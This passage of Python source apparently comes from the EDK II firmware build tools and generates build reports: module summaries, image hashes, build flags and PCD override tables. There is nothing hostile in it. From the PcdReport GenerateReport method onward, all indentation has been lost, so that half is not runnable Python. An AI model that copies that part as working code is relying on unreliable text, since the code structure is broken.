            self.BuildFlags[Tool + "_FLAGS"] = M.BuildOption.get(Tool, {}).get("FLAGS", "")
    ##
    # Generate report for module build flags information
    #
    # Writes the tool chain tag followed by one "<TOOL>_FLAGS = ..." entry
    # per collected tool into the build flags subsection.
    #
    # @param self            The object pointer
    # @param File            The file object for report
    #
    def GenerateReport(self, File):
        FileWrite(File, gSubSectionStart)
        FileWrite(File, "Build Flags")
        FileWrite(File, "Tool Chain Tag: %s" % self.ToolChainTag)
        for FlagName, FlagValue in self.BuildFlags.items():
            FileWrite(File, gSubSectionSep)
            FileWrite(File, "%s = %s" % (FlagName, FlagValue), True)
        FileWrite(File, gSubSectionEnd)
##
# Reports individual module information
#
# This class reports the module section in the build report file.
# It comprises of module summary, module PCD, library, dependency expression,
# build flags sections.
#
class ModuleReport(object):
    ##
    # Constructor function for class ModuleReport
    #
    # This constructor function generates ModuleReport object for
    # a separate module in a platform build.
    #
    # @param self            The object pointer
    # @param M               Module context information
    # @param ReportType      The kind of report items in the final report file
    #
    def __init__(self, M, ReportType):
        self.ModuleName = M.Module.BaseName
        self.ModuleInfPath = M.MetaFile.File
        self.FileGuid = M.Guid
        self.Size = 0
        self.BuildTimeStamp = None
        self.Hash = 0
        self.DriverType = ""
        if not M.IsLibrary:
            ModuleType = M.ModuleType
            if not ModuleType:
                ModuleType = COMPONENT_TO_MODULE_MAP_DICT.get(M.ComponentType, "")
            #
            # If a module complies to PI 1.1, promote Module type to "SMM_DRIVER"
            #
            if ModuleType == SUP_MODULE_DXE_SMM_DRIVER:
                PiSpec = M.Module.Specification.get("PI_SPECIFICATION_VERSION", "0x00010000")
                if int(PiSpec, 0) >= 0x0001000A:
                    ModuleType = "SMM_DRIVER"
            self.DriverType = gDriverTypeMap.get(ModuleType, "0x2 (FREE_FORM)")
        self.UefiSpecVersion = M.Module.Specification.get("UEFI_SPECIFICATION_VERSION", "")
        self.PiSpecVersion = M.Module.Specification.get("PI_SPECIFICATION_VERSION", "")
        self.PciDeviceId = M.Module.Defines.get("PCI_DEVICE_ID", "")
        self.PciVendorId = M.Module.Defines.get("PCI_VENDOR_ID", "")
        self.PciClassCode = M.Module.Defines.get("PCI_CLASS_CODE", "")
        self.BuildTime = M.BuildTime
        self._BuildDir = M.BuildDir
        self.ModulePcdSet = {}
        if "PCD" in ReportType:
            #
            # Collect all module used PCD set: module INF referenced directly or indirectly.
            # It also saves module INF default values of them in case they exist.
            #
            for Pcd in M.ModulePcdList + M.LibraryPcdList:
                self.ModulePcdSet.setdefault((Pcd.TokenCName, Pcd.TokenSpaceGuidCName, Pcd.Type), (Pcd.InfDefaultValue, Pcd.DefaultValue))
        self.LibraryReport = None
        if "LIBRARY" in ReportType:
            self.LibraryReport = LibraryReport(M)
        self.DepexReport = None
        if "DEPEX" in ReportType:
            self.DepexReport = DepexReport(M)
        if "BUILD_FLAGS" in ReportType:
            self.BuildFlagsReport = BuildFlagsReport(M)
    ##
    # Generate report for module information
    #
    # This function generates report for separate module expression
    # in a platform build.
    #
    # @param self                   The object pointer
    # @param File                   The file object for report
    # @param GlobalPcdReport        The platform global PCD report object
    # @param GlobalPredictionReport The platform global Prediction report object
    # @param GlobalDepexParser      The platform global Dependency expression parser object
    # @param ReportType             The kind of report items in the final report file
    #
    def GenerateReport(self, File, GlobalPcdReport, GlobalPredictionReport, GlobalDepexParser, ReportType):
        FileWrite(File, gSectionStart)
        FwReportFileName = os.path.join(self._BuildDir, "DEBUG", self.ModuleName + ".txt")
        if os.path.isfile(FwReportFileName):
            try:
                # Use a context manager so the intermediate report file
                # handle is not leaked.
                with open(FwReportFileName) as FdReport:
                    FileContents = FdReport.read()
                Match = gModuleSizePattern.search(FileContents)
                if Match:
                    self.Size = int(Match.group(1))
                Match = gTimeStampPattern.search(FileContents)
                if Match:
                    self.BuildTimeStamp = datetime.fromtimestamp(int(Match.group(1)))
            except IOError:
                EdkLogger.warn(None, "Fail to read report file", FwReportFileName)
        if "HASH" in ReportType:
            OutputDir = os.path.join(self._BuildDir, "OUTPUT")
            DefaultEFIfile = os.path.join(OutputDir, self.ModuleName + ".efi")
            if os.path.isfile(DefaultEFIfile):
                Tempfile = os.path.join(OutputDir, self.ModuleName + "_hash.tmp")
                # rebase the efi image since its base address may not zero
                cmd = ["GenFw", "--rebase", str(0), "-o", Tempfile, DefaultEFIfile]
                try:
                    PopenObject = subprocess.Popen(' '.join(cmd), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)
                except Exception as X:
                    EdkLogger.error("GenFw", COMMAND_FAILURE, ExtraData="%s: %s" % (str(X), cmd[0]))
                EndOfProcedure = threading.Event()
                EndOfProcedure.clear()
                if PopenObject.stderr:
                    StdErrThread = threading.Thread(target=ReadMessage, args=(PopenObject.stderr, EdkLogger.quiet, EndOfProcedure))
                    StdErrThread.setName("STDERR-Redirector")
                    StdErrThread.setDaemon(False)
                    StdErrThread.start()
                # waiting for program exit
                PopenObject.wait()
                if PopenObject.stderr:
                    StdErrThread.join()
                if PopenObject.returncode != 0:
                    EdkLogger.error("GenFw", COMMAND_FAILURE, "Failed to generate firmware hash image for %s" % (DefaultEFIfile))
                if os.path.isfile(Tempfile):
                    # hashlib's update() returns None, so the original
                    # 'if self.Hash.update(buf): self.Hash = self.Hash.update(buf)'
                    # branch was dead code that would have clobbered the
                    # digest had it ever executed.  Hash the rebased image
                    # directly and close the file promptly.
                    Sha1 = hashlib.sha1()
                    with open(Tempfile, 'rb') as FdTemp:
                        Sha1.update(FdTemp.read())
                    self.Hash = Sha1.hexdigest()
                    os.remove(Tempfile)
        FileWrite(File, "Module Summary")
        FileWrite(File, "Module Name: %s" % self.ModuleName)
        FileWrite(File, "Module INF Path: %s" % self.ModuleInfPath)
        FileWrite(File, "File GUID: %s" % self.FileGuid)
        if self.Size:
            FileWrite(File, "Size: 0x%X (%.2fK)" % (self.Size, self.Size / 1024.0))
        if self.Hash:
            FileWrite(File, "SHA1 HASH: %s *%s" % (self.Hash, self.ModuleName + ".efi"))
        if self.BuildTimeStamp:
            FileWrite(File, "Build Time Stamp: %s" % self.BuildTimeStamp)
        if self.BuildTime:
            FileWrite(File, "Module Build Time: %s" % self.BuildTime)
        if self.DriverType:
            FileWrite(File, "Driver Type: %s" % self.DriverType)
        if self.UefiSpecVersion:
            FileWrite(File, "UEFI Spec Version: %s" % self.UefiSpecVersion)
        if self.PiSpecVersion:
            FileWrite(File, "PI Spec Version: %s" % self.PiSpecVersion)
        if self.PciDeviceId:
            FileWrite(File, "PCI Device ID: %s" % self.PciDeviceId)
        if self.PciVendorId:
            FileWrite(File, "PCI Vendor ID: %s" % self.PciVendorId)
        if self.PciClassCode:
            FileWrite(File, "PCI Class Code: %s" % self.PciClassCode)
        FileWrite(File, gSectionSep)
        if "PCD" in ReportType:
            GlobalPcdReport.GenerateReport(File, self.ModulePcdSet)
        if "LIBRARY" in ReportType:
            self.LibraryReport.GenerateReport(File)
        if "DEPEX" in ReportType:
            self.DepexReport.GenerateReport(File, GlobalDepexParser)
        if "BUILD_FLAGS" in ReportType:
            self.BuildFlagsReport.GenerateReport(File)
        if "FIXED_ADDRESS" in ReportType and self.FileGuid:
            GlobalPredictionReport.GenerateReport(File, self.FileGuid)
        FileWrite(File, gSectionEnd)
def ReadMessage(From, To, ExitFlag):
    ## Pump lines from a stream to a logger callable.
    #
    # Reads From one line at a time and forwards each rstripped line to the
    # To callable, until end-of-file is reached or ExitFlag is set.
    #
    # @param From      The file-like object to read lines from
    # @param To        Callable invoked with each stripped line
    # @param ExitFlag  threading.Event checked after each line for early stop
    #
    while True:
        Line = From.readline()
        # readline() returns an empty string only at end-of-file (it never
        # returns None, so the old 'Line is not None' test was redundant).
        if not Line:
            break
        To(Line.rstrip())
        # is_set() replaces the deprecated camelCase alias isSet().
        if ExitFlag.is_set():
            break
##
# Reports platform and module PCD information
#
# This class reports the platform PCD section and module PCD subsection
# in the build report file.
#
class PcdReport(object):
##
# Constructor function for class PcdReport
#
# This constructor function generates PcdReport object a platform build.
# It collects the whole PCD database from platform DSC files, platform
# flash description file and package DEC files.
#
# @param self The object pointer
# @param Wa Workspace context information
#
    def __init__(self, Wa):
        """Collect the platform-wide PCD database for reporting.

        Walks every architecture's AutoGen object in Wa and gathers:
        referenced PCDs grouped by token space GUID (AllPcds), PCDs defined
        in DSC/FDF but not used by any module (UnusedPcds), PCDs used in
        conditional directives (ConditionalPcds), per-module override
        values (ModulePcdOverride), and the DEC/DSC default values.
        """
        self.AllPcds = {}
        self.UnusedPcds = {}
        self.ConditionalPcds = {}
        # Widest TokenCName seen; tracked for report column alignment.
        self.MaxLen = 0
        self.Arch = None
        if Wa.FdfProfile:
            self.FdfPcdSet = Wa.FdfProfile.PcdDict
        else:
            self.FdfPcdSet = {}
        # Single default-store / single SKU unless GlobalData says otherwise.
        self.DefaultStoreSingle = True
        self.SkuSingle = True
        if GlobalData.gDefaultStores and len(GlobalData.gDefaultStores) > 1:
            self.DefaultStoreSingle = False
        if GlobalData.gSkuids and len(GlobalData.gSkuids) > 1:
            self.SkuSingle = False
        self.ModulePcdOverride = {}
        for Pa in Wa.AutoGenObjectList:
            # NOTE(review): self.Arch ends up as the LAST architecture in
            # the list — confirm that is the intended behavior downstream.
            self.Arch = Pa.Arch
            #
            # Collect all platform referenced PCDs and grouped them by PCD token space
            # GUID C Names
            #
            for Pcd in Pa.AllPcdList:
                PcdList = self.AllPcds.setdefault(Pcd.TokenSpaceGuidCName, {}).setdefault(Pcd.Type, [])
                if Pcd not in PcdList:
                    PcdList.append(Pcd)
                if len(Pcd.TokenCName) > self.MaxLen:
                    self.MaxLen = len(Pcd.TokenCName)
            #
            # Collect the PCD defined in DSC/FDF file, but not used in module
            #
            UnusedPcdFullList = []
            for item in Pa.Platform.Pcds:
                Pcd = Pa.Platform.Pcds[item]
                if not Pcd.Type:
                    # check the Pcd in FDF file, whether it is used in module first
                    for T in PCD_TYPE_LIST:
                        PcdList = self.AllPcds.setdefault(Pcd.TokenSpaceGuidCName, {}).setdefault(T, [])
                        if Pcd in PcdList:
                            Pcd.Type = T
                            break
                if not Pcd.Type:
                    # Still untyped: look the PCD up in each package's DEC
                    # declarations to recover its type (and datum type).
                    PcdTypeFlag = False
                    for package in Pa.PackageList:
                        for T in PCD_TYPE_LIST:
                            if (Pcd.TokenCName, Pcd.TokenSpaceGuidCName, T) in package.Pcds:
                                Pcd.Type = T
                                PcdTypeFlag = True
                                if not Pcd.DatumType:
                                    Pcd.DatumType = package.Pcds[(Pcd.TokenCName, Pcd.TokenSpaceGuidCName, T)].DatumType
                                break
                        if PcdTypeFlag:
                            break
                if not Pcd.DatumType:
                    PcdType = Pcd.Type
                    # Try to remove Hii and Vpd suffix
                    if PcdType.startswith(TAB_PCDS_DYNAMIC_EX):
                        PcdType = TAB_PCDS_DYNAMIC_EX
                    elif PcdType.startswith(TAB_PCDS_DYNAMIC):
                        PcdType = TAB_PCDS_DYNAMIC
                    for package in Pa.PackageList:
                        if (Pcd.TokenCName, Pcd.TokenSpaceGuidCName, PcdType) in package.Pcds:
                            Pcd.DatumType = package.Pcds[(Pcd.TokenCName, Pcd.TokenSpaceGuidCName, PcdType)].DatumType
                            break
                # A platform PCD not present in AllPcds (i.e. not referenced
                # by any module) is a candidate for the unused list.
                PcdList = self.AllPcds.setdefault(Pcd.TokenSpaceGuidCName, {}).setdefault(Pcd.Type, [])
                UnusedPcdList = self.UnusedPcds.setdefault(Pcd.TokenSpaceGuidCName, {}).setdefault(Pcd.Type, [])
                if Pcd in UnusedPcdList:
                    UnusedPcdList.remove(Pcd)
                if Pcd not in PcdList and Pcd not in UnusedPcdFullList:
                    UnusedPcdFullList.append(Pcd)
                if len(Pcd.TokenCName) > self.MaxLen:
                    self.MaxLen = len(Pcd.TokenCName)
            if GlobalData.gConditionalPcds:
                for PcdItem in GlobalData.gConditionalPcds:
                    if '.' in PcdItem:
                        (TokenSpaceGuidCName, TokenCName) = PcdItem.split('.')
                        if (TokenCName, TokenSpaceGuidCName) in Pa.Platform.Pcds:
                            Pcd = Pa.Platform.Pcds[(TokenCName, TokenSpaceGuidCName)]
                            PcdList = self.ConditionalPcds.setdefault(Pcd.TokenSpaceGuidCName, {}).setdefault(Pcd.Type, [])
                            if Pcd not in PcdList:
                                PcdList.append(Pcd)
            # PCDs used by conditional directives are excluded from the
            # unused-PCD report section.
            UnusedPcdList = []
            if UnusedPcdFullList:
                for Pcd in UnusedPcdFullList:
                    if Pcd.TokenSpaceGuidCName + '.' + Pcd.TokenCName in GlobalData.gConditionalPcds:
                        continue
                    UnusedPcdList.append(Pcd)
            for Pcd in UnusedPcdList:
                PcdList = self.UnusedPcds.setdefault(Pcd.TokenSpaceGuidCName, {}).setdefault(Pcd.Type, [])
                if Pcd not in PcdList:
                    PcdList.append(Pcd)
            for Module in Pa.Platform.Modules.values():
                #
                # Collect module override PCDs
                #
                for ModulePcd in Module.M.ModulePcdList + Module.M.LibraryPcdList:
                    TokenCName = ModulePcd.TokenCName
                    TokenSpaceGuid = ModulePcd.TokenSpaceGuidCName
                    ModuleDefault = ModulePcd.DefaultValue
                    ModulePath = os.path.basename(Module.M.MetaFile.File)
                    self.ModulePcdOverride.setdefault((TokenCName, TokenSpaceGuid), {})[ModulePath] = ModuleDefault
        #
        # Collect PCD DEC default value.
        #
        self.DecPcdDefault = {}
        self._GuidDict = {}
        for Pa in Wa.AutoGenObjectList:
            for Package in Pa.PackageList:
                Guids = Package.Guids
                self._GuidDict.update(Guids)
                for (TokenCName, TokenSpaceGuidCName, DecType) in Package.Pcds:
                    DecDefaultValue = Package.Pcds[TokenCName, TokenSpaceGuidCName, DecType].DefaultValue
                    # setdefault: the first package to declare the PCD wins.
                    self.DecPcdDefault.setdefault((TokenCName, TokenSpaceGuidCName, DecType), DecDefaultValue)
        #
        # Collect PCDs defined in DSC common section
        #
        self.DscPcdDefault = {}
        for Pa in Wa.AutoGenObjectList:
            for (TokenCName, TokenSpaceGuidCName) in Pa.Platform.Pcds:
                DscDefaultValue = Pa.Platform.Pcds[(TokenCName, TokenSpaceGuidCName)].DscDefaultValue
                if DscDefaultValue:
                    self.DscPcdDefault[(TokenCName, TokenSpaceGuidCName)] = DscDefaultValue
def GenerateReport(self, File, ModulePcdSet):
if not ModulePcdSet:
if self.ConditionalPcds:
self.GenerateReportDetail(File, ModulePcdSet, 1)
if self.UnusedPcds:
IsEmpty = True
for Token in self.UnusedPcds:
TokenDict = self.UnusedPcds[Token]
for Type in TokenDict:
if TokenDict[Type]:
IsEmpty = False
break
if not IsEmpty:
break
if not IsEmpty:
self.GenerateReportDetail(File, ModulePcdSet, 2)
self.GenerateReportDetail(File, ModulePcdSet)
##
# Generate report for PCD information
#
# This function generates report for separate module expression
# in a platform build.
#
# @param self The object pointer
# @param File The file object for report
# @param ModulePcdSet Set of all PCDs referenced by module or None for
# platform PCD report
# @param ReportySubType 0 means platform/module PCD report, 1 means Conditional
# directives section report, 2 means Unused Pcds section report
# @param DscOverridePcds Module DSC override PCDs set
#
def GenerateReportDetail(self, File, ModulePcdSet, ReportSubType = 0):
PcdDict = self.AllPcds
if ReportSubType == 1:
PcdDict = self.ConditionalPcds
elif ReportSubType == 2:
PcdDict = self.UnusedPcds
if not ModulePcdSet:
FileWrite(File, gSectionStart)
if ReportSubType == 1:
FileWrite(File, "Conditional Directives used by the build system")
elif ReportSubType == 2:
FileWrite(File, "PCDs not used by modules or in conditional directives")
else:
FileWrite(File, "Platform Configuration Database Report")
FileWrite(File, " *B - PCD override in the build option")
FileWrite(File, " *P - Platform scoped PCD override in DSC file")
FileWrite(File, " *F - Platform scoped PCD override in FDF file")
if not ReportSubType:
FileWrite(File, " *M - Module scoped PCD override")
FileWrite(File, gSectionSep)
else:
if not ReportSubType and ModulePcdSet:
#
# For module PCD sub-section
#
FileWrite(File, gSubSectionStart)
FileWrite(File, TAB_BRG_PCD)
FileWrite(File, gSubSectionSep)
AllPcdDict = {}
for Key in PcdDict:
AllPcdDict[Key] = {}
for Type in PcdDict[Key]:
for Pcd in PcdDict[Key][Type]:
AllPcdDict[Key][(Pcd.TokenCName, Type)] = Pcd
for Key in sorted(AllPcdDict):
#
# Group PCD by their token space GUID C Name
#
First = True
for PcdTokenCName, Type in sorted(AllPcdDict[Key]):
#
# Group PCD by their usage type
#
Pcd = AllPcdDict[Key][(PcdTokenCName, Type)]
TypeName, DecType = gPcdTypeMap.get(Type, ("", Type))
MixedPcdFlag = False
if GlobalData.MixedPcd:
for PcdKey in GlobalData.MixedPcd:
if (Pcd.TokenCName, Pcd.TokenSpaceGuidCName) in GlobalData.MixedPcd[PcdKey]:
PcdTokenCName = PcdKey[0]
MixedPcdFlag = True
if MixedPcdFlag and not ModulePcdSet:
continue
#
# Get PCD default value and their override relationship
#
DecDefaultValue = self.DecPcdDefault.get((Pcd.TokenCName, Pcd.TokenSpaceGuidCName, DecType))
DscDefaultValue = self.DscPcdDefault.get((Pcd.TokenCName, Pcd.TokenSpaceGuidCName))
DscDefaultValBak = DscDefaultValue
Field = ''
for (CName, Guid, Field) in self.FdfPcdSet:
if CName == PcdTokenCName and Guid == Key:
DscDefaultValue = self.FdfPcdSet[(CName, Guid, Field)]
break
if DscDefaultValue != DscDefaultValBak:
try:
DscDefaultValue = ValueExpressionEx(DscDefaultValue, Pcd.DatumType, self._GuidDict)(True)
except BadExpression as DscDefaultValue:
EdkLogger.error('BuildReport', FORMAT_INVALID, "PCD Value: %s, Type: %s" %(DscDefaultValue, Pcd.DatumType))
InfDefaultValue = None
PcdValue = DecDefaultValue
if DscDefaultValue:
PcdValue = DscDefaultValue
#The DefaultValue of StructurePcd already be the latest, no need to update.
if not self.IsStructurePcd(Pcd.TokenCName, Pcd.TokenSpaceGuidCName):
Pcd.DefaultValue = PcdValue
if ModulePcdSet is not None:
if (Pcd.TokenCName, Pcd.TokenSpaceGuidCName, Type) not in ModulePcdSet:
continue
InfDefaultValue, PcdValue = ModulePcdSet[Pcd.TokenCName, Pcd.TokenSpaceGuidCName, Type]
#The DefaultValue of StructurePcd already be the latest, no need to update.
if not self.IsStructurePcd(Pcd.TokenCName, Pcd.TokenSpaceGuidCName):
Pcd.DefaultValue = PcdValue
if InfDefaultValue:
try:
InfDefaultValue = ValueExpressionEx(InfDefaultValue, Pcd.DatumType, self._GuidDict)(True)
except BadExpression as InfDefaultValue:
EdkLogger.error('BuildReport', FORMAT_INVALID, "PCD Value: %s, Type: %s" % (InfDefaultValue, Pcd.DatumType))
if InfDefaultValue == "":
InfDefaultValue = None
BuildOptionMatch = False
if GlobalData.BuildOptionPcd:
for pcd in GlobalData.BuildOptionPcd:
if (Pcd.TokenSpaceGuidCName, Pcd.TokenCName) == (pcd[0], pcd[1]):
if pcd[2]:
continue
PcdValue = pcd[3]
#The DefaultValue of StructurePcd already be the latest, no need to update.
if not self.IsStructurePcd(Pcd.TokenCName, Pcd.TokenSpaceGuidCName):
Pcd.DefaultValue = PcdValue
BuildOptionMatch = True
break
if First:
if ModulePcdSet is None:
FileWrite(File, "")
FileWrite(File, Key)
First = False
if Pcd.DatumType in TAB_PCD_NUMERIC_TYPES:
PcdValueNumber = int(PcdValue.strip(), 0)
if DecDefaultValue is None:
DecMatch = True
else:
DecDefaultValueNumber = int(DecDefaultValue.strip(), 0)
DecMatch = (DecDefaultValueNumber == PcdValueNumber)
if InfDefaultValue is None:
InfMatch = True
else:
InfDefaultValueNumber = int(InfDefaultValue.strip(), 0)
InfMatch = (InfDefaultValueNumber == PcdValueNumber)
if DscDefaultValue is None:
DscMatch = True
else:
DscDefaultValueNumber = int(DscDefaultValue.strip(), 0)
DscMatch = (DscDefaultValueNumber == PcdValueNumber)
else:
if DecDefaultValue is None:
DecMatch = True
else:
DecMatch = (DecDefaultValue.strip() == PcdValue.strip())
if InfDefaultValue is None:
InfMatch = True
else:
InfMatch = (InfDefaultValue.strip() == PcdValue.strip())
if DscDefaultValue is None:
DscMatch = True
else:
DscMatch = (DscDefaultValue.strip() == PcdValue.strip())
IsStructure = False
if self.IsStructurePcd(Pcd.TokenCName, Pcd.TokenSpaceGuidCName):
IsStructure = True
if TypeName in ('DYNVPD', 'DEXVPD'):
SkuInfoList = Pcd.SkuInfoList
Pcd = GlobalData.gStructurePcd[self.Arch][(Pcd.TokenCName, Pcd.TokenSpaceGuidCName)]
Pcd.DatumType = Pcd.StructName
if TypeName in ('DYNVPD', 'DEXVPD'):
Pcd.SkuInfoList = SkuInfoList
if Pcd.PcdValueFromComm or Pcd.PcdFieldValueFromComm:
BuildOptionMatch = True
DecMatch = False
elif Pcd.PcdValueFromFdf or Pcd.PcdFieldValueFromFdf:
DscDefaultValue = True
DscMatch = True
DecMatch = False
elif Pcd.SkuOverrideValues:
DscOverride = False
if Pcd.DefaultFromDSC:
DscOverride = True
else:
DictLen = 0
for item in Pcd.SkuOverrideValues:
DictLen += len(Pcd.SkuOverrideValues[item])
if not DictLen:
DscOverride = False
else:
if not Pcd.SkuInfoList:
OverrideValues = Pcd.SkuOverrideValues
if OverrideValues:
for Data in OverrideValues.values():
Struct = list(Data.values())
if Struct:
DscOverride = self.ParseStruct(Struct[0])
break
else:
SkuList = sorted(Pcd.SkuInfoList.keys())
for Sku in SkuList:
SkuInfo = Pcd.SkuInfoList[Sku]
if TypeName in ('DYNHII', 'DEXHII'):
if SkuInfo.DefaultStoreDict:
DefaultStoreList = sorted(SkuInfo.DefaultStoreDict.keys())
for DefaultStore in DefaultStoreList:
OverrideValues = Pcd.SkuOverrideValues[Sku]
DscOverride = self.ParseStruct(OverrideValues[DefaultStore])
if DscOverride:
break
else:
OverrideValues = Pcd.SkuOverrideValues[Sku]
if OverrideValues:
Keys = list(OverrideValues.keys())
OverrideFieldStruct = self.OverrideFieldValue(Pcd, OverrideValues[Keys[0]])
DscOverride = self.ParseStruct(OverrideFieldStruct)
if DscOverride:
break
if DscOverride:
DscDefaultValue = True
DscMatch = True
DecMatch = False
else:
DecMatch = True
else:
DscDefaultValue = True
DscMatch = True
DecMatch = False
#
# Report PCD item according to their override relationship
#
if Pcd.DatumType == 'BOOLEAN':
if DscDefaultValue:
DscDefaultValue = str(int(DscDefaultValue, 0))
if DecDefaultValue:
DecDefaultValue = str(int(DecDefaultValue, 0))
if InfDefaultValue:
InfDefaultValue = str(int(InfDefaultValue, 0))
if Pcd.DefaultValue:
Pcd.DefaultValue = str(int(Pcd.DefaultValue, 0))
if DecMatch:
self.PrintPcdValue(File, Pcd, PcdTokenCName, TypeName, IsStructure, DscMatch, DscDefaultValBak, InfMatch, InfDefaultValue, DecMatch, DecDefaultValue, ' ')
elif InfDefaultValue and InfMatch:
self.PrintPcdValue(File, Pcd, PcdTokenCName, TypeName, IsStructure, DscMatch, DscDefaultValBak, InfMatch, InfDefaultValue, DecMatch, DecDefaultValue, '*M')
elif BuildOptionMatch:
self.PrintPcdValue(File, Pcd, PcdTokenCName, TypeName, IsStructure, DscMatch, DscDefaultValBak, InfMatch, InfDefaultValue, DecMatch, DecDefaultValue, '*B')
else:
if DscDefaultValue and DscMatch:
if (Pcd.TokenCName, Key, Field) in self.FdfPcdSet:
self.PrintPcdValue(File, Pcd, PcdTokenCName, TypeName, IsStructure, DscMatch, DscDefaultValBak, InfMatch, InfDefaultValue, DecMatch, DecDefaultValue, '*F')
else:
self.PrintPcdValue(File, Pcd, PcdTokenCName, TypeName, IsStructure, DscMatch, DscDefaultValBak, InfMatch, InfDefaultValue, DecMatch, DecDefaultValue, '*P')
else:
self.PrintPcdValue(File, Pcd, PcdTokenCName, TypeName, IsStructure, DscMatch, DscDefaultValBak, InfMatch, InfDefaultValue, DecMatch, DecDefaultValue, '*M')
if ModulePcdSet is None:
if IsStructure:
continue
if not TypeName in ('PATCH', 'FLAG', 'FIXED'):
continue
if not BuildOptionMatch:
ModuleOverride = self.ModulePcdOverride.get((Pcd.TokenCName, Pcd.TokenSpaceGuidCName), {})
for ModulePath in ModuleOverride:
ModuleDefault = ModuleOverride[ModulePath]
if Pcd.DatumType in TAB_PCD_NUMERIC_TYPES:
ModulePcdDefaultValueNumber = int(ModuleDefault.strip(), 0)
Match = (ModulePcdDefaultValueNumber == PcdValueNumber)
if Pcd.DatumType == 'BOOLEAN':
ModuleDefault = str(ModulePcdDefaultValueNumber)
else:
Match = (ModuleDefault.strip() == PcdValue.strip())
if Match:
continue
IsByteArray, ArrayList = ByteArrayForamt(ModuleDefault.strip())
if IsByteArray:
FileWrite(File, ' *M %-*s = %s' % (self.MaxLen + 15, ModulePath, '{'))
for Array in ArrayList:
FileWrite(File, Array)
else:
Value = ModuleDefault.strip()
if Pcd.DatumType in TAB_PCD_CLEAN_NUMERIC_TYPES:
if Value.startswith(('0x', '0X')):
Value = '{} ({:d})'.format(Value, int(Value, 0))
else:
Value = "0x{:X} ({})".format(int(Value, 0), Value)
FileWrite(File, ' *M %-*s = %s' % (self.MaxLen + 15, ModulePath, Value))
if ModulePcdSet is None:
FileWrite(File, gSectionEnd)
else:
if not ReportSubType and ModulePcdSet:
FileWrite(File, gSubSectionEnd)
def ParseStruct(self, struct):
HasDscOverride = False
if struct:
for _, Values in struct.items():
if Values[1] and Values[1].endswith('.dsc'):
HasDscOverride = True
break
return HasDscOverride
def PrintPcdDefault(self, File, Pcd, IsStructure, DscMatch, DscDefaultValue, InfMatch, InfDefaultValue, DecMatch, DecDefaultValue):
if not DscMatch and DscDefaultValue is not None:
Value = DscDefaultValue.strip()
IsByteArray, ArrayList = ByteArrayForamt(Value)
if IsByteArray:
FileWrite(File, ' %*s = %s' % (self.MaxLen + 19, 'DSC DEFAULT', "{"))
for Array in ArrayList:
FileWrite(File, Array)
else:
if Pcd.DatumType in TAB_PCD_CLEAN_NUMERIC_TYPES:
if Value.startswith(('0x', '0X')):
Value = '{} ({:d})'.format(Value, int(Value, 0))
else:
Value = "0x{:X} ({})".format(int(Value, 0), Value)
FileWrite(File, ' %*s = %s' % (self.MaxLen + 19, 'DSC DEFAULT', Value))
if not InfMatch and InfDefaultValue is not None:
Value = InfDefaultValue.strip()
IsByteArray, ArrayList = ByteArrayForamt(Value)
if IsByteArray:
FileWrite(File, ' %*s = %s' % (self.MaxLen + 19, 'INF DEFAULT', "{"))
for Array in ArrayList:
FileWrite(File, Array)
else:
if Pcd.DatumType in TAB_PCD_CLEAN_NUMERIC_TYPES:
if Value.startswith(('0x', '0X')):
Value = '{} ({:d})'.format(Value, int(Value, 0))
else:
Value = "0x{:X} ({})".format(int(Value, 0), Value)
FileWrite(File, ' %*s = %s' % (self.MaxLen + 19, 'INF DEFAULT', Value))
if not DecMatch and DecDefaultValue is not None:
Value = DecDefaultValue.strip()
IsByteArray, ArrayList = ByteArrayForamt(Value)
if IsByteArray:
FileWrite(File, ' %*s = %s' % (self.MaxLen + 19, 'DEC DEFAULT', "{"))
for Array in ArrayList:
FileWrite(File, Array)
else:
if Pcd.DatumType in TAB_PCD_CLEAN_NUMERIC_TYPES:
if Value.startswith(('0x', '0X')):
Value = '{} ({:d})'.format(Value, int(Value, 0))
else:
Value = "0x{:X} ({})".format(int(Value, 0), Value)
FileWrite(File, ' %*s = %s' % (self.MaxLen + 19, 'DEC DEFAULT', Value))
if IsStructure:
self.PrintStructureInfo(File, Pcd.DefaultValues)
if DecMatch and IsStructure:
self.PrintStructureInfo(File, Pcd.DefaultValues)
def PrintPcdValue(self, File, Pcd, PcdTokenCName, TypeName, IsStructure, DscMatch, DscDefaultValue, InfMatch, InfDefaultValue, DecMatch, DecDefaultValue, Flag = ' '):
if not Pcd.SkuInfoList:
Value = Pcd.DefaultValue
IsByteArray, ArrayList = ByteArrayForamt(Value)
if IsByteArray:
FileWrite(File, ' %-*s : %6s %10s = %s' % (self.MaxLen, Flag + ' ' + PcdTokenCName, TypeName, '(' + Pcd.DatumType + ')', '{'))
for Array in ArrayList:
FileWrite(File, Array)
else:
if Pcd.DatumType in TAB_PCD_CLEAN_NUMERIC_TYPES:
if Value.startswith(('0x', '0X')):
Value = '{} ({:d})'.format(Value, int(Value, 0))
else:
Value = "0x{:X} ({})".format(int(Value, 0), Value)
FileWrite(File, ' %-*s : %6s %10s = %s' % (self.MaxLen, Flag + ' ' + PcdTokenCName, TypeName, '(' + Pcd.DatumType + ')', Value))
if IsStructure:
FiledOverrideFlag = False
OverrideValues = Pcd.SkuOverrideValues
if OverrideValues:
for Data in OverrideValues.values():
Struct = list(Data.values())
if Struct:
OverrideFieldStruct = self.OverrideFieldValue(Pcd, Struct[0])
self.PrintStructureInfo(File, OverrideFieldStruct)
FiledOverrideFlag = True
break
if not FiledOverrideFlag and (Pcd.PcdFieldValueFromComm or Pcd.PcdFieldValueFromFdf):
OverrideFieldStruct = self.OverrideFieldValue(Pcd, {})
self.PrintStructureInfo(File, OverrideFieldStruct)
self.PrintPcdDefault(File, Pcd, IsStructure, DscMatch, DscDefaultValue, InfMatch, InfDefaultValue, DecMatch, DecDefaultValue)
else:
FirstPrint = True
SkuList = sorted(Pcd.SkuInfoList.keys())
for Sku in SkuList:
SkuInfo = Pcd.SkuInfoList[Sku]
SkuIdName = SkuInfo.SkuIdName
if TypeName in ('DYNHII', 'DEXHII'):
if SkuInfo.DefaultStoreDict:
DefaultStoreList = sorted(SkuInfo.DefaultStoreDict.keys())
for DefaultStore in DefaultStoreList:
Value = SkuInfo.DefaultStoreDict[DefaultStore]
IsByteArray, ArrayList = ByteArrayForamt(Value)
if Pcd.DatumType == 'BOOLEAN':
Value = str(int(Value, 0))
if FirstPrint:
FirstPrint = False
if IsByteArray:
if self.DefaultStoreSingle and self.SkuSingle:
